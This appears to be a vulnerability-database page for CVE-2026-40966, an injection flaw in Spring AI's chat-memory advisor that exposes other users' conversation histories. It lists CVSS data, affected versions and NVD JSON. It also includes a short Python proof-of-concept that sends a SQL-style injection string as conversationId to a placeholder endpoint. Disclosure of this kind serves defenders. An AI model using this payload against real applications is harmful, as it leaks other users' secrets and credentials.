Security Vulnerability Report
中文
CVE-2026-40966 CVSS 5.9 MEDIUM

CVE-2026-40966

Published: 2026-04-28 08:16:01
Last Modified: 2026-04-29 18:18:01
Source: [email protected]

Description

In Spring AI, an attacker can bypass conversation isolation and exfiltrate sensitive memory from other users’ chat histories, including secrets and credentials, by injecting filter logic through conversationId. Only applications that use VectorStoreChatMemoryAdvisor and pass user-supplied input as a conversationId are affected.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:vmware:spring_ai:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:vmware:spring_ai:*:*:*:*:*:*:*:* - VULNERABLE
Spring AI (使用 VectorStoreChatMemoryAdvisor 的特定版本,具体请参考官方公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # Target URL (Example) target = "http://vulnerable-spring-ai-app/api/chat" # Malicious payload attempting to inject filter logic via conversationId # This attempts to bypass isolation by injecting a condition that matches other users' data # Actual syntax depends on the underlying VectorStore implementation (e.g., Redis, Milvus) malicious_conversation_id = "admin' OR '1'='1" headers = { "Content-Type": "application/json" } data = { "message": "List all previous chat contents", "conversationId": malicious_conversation_id } try: response = requests.post(target, data=json.dumps(data), headers=headers) if response.status_code == 200: print("[+] Potential exploit successful!") print("[+] Response:") print(response.text) else: print("[-] Request failed with status code:", response.status_code) except Exception as e: print("[-] An error occurred:", e)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40966", "sourceIdentifier": "[email protected]", "published": "2026-04-28T08:16:01.283", "lastModified": "2026-04-29T18:18:01.317", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Spring AI, an attacker can bypass conversation isolation and exfiltrate sensitive memory from other users’ chat histories, including secrets and credentials, by injecting filter logic through conversationId. Only applications that use VectorStoreChatMemoryAdvisor and pass user-supplied input as a conversationId are affected."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_ai:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "1.0.6", "matchCriteriaId": "1CD6DC44-CDE8-47E4-A788-6D8AE716396F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_ai:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.1.0", "versionEndExcluding": "1.1.5", "matchCriteriaId": "5013645B-3914-4A40-8D42-CB47344963A7"}]}]}], "references": [{"url": "https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?version=3.1&vector=AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "source": "[email protected]", "tags": ["US Government Resource"]}, {"url": "https://spring.io/security/cve-2026-40966", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.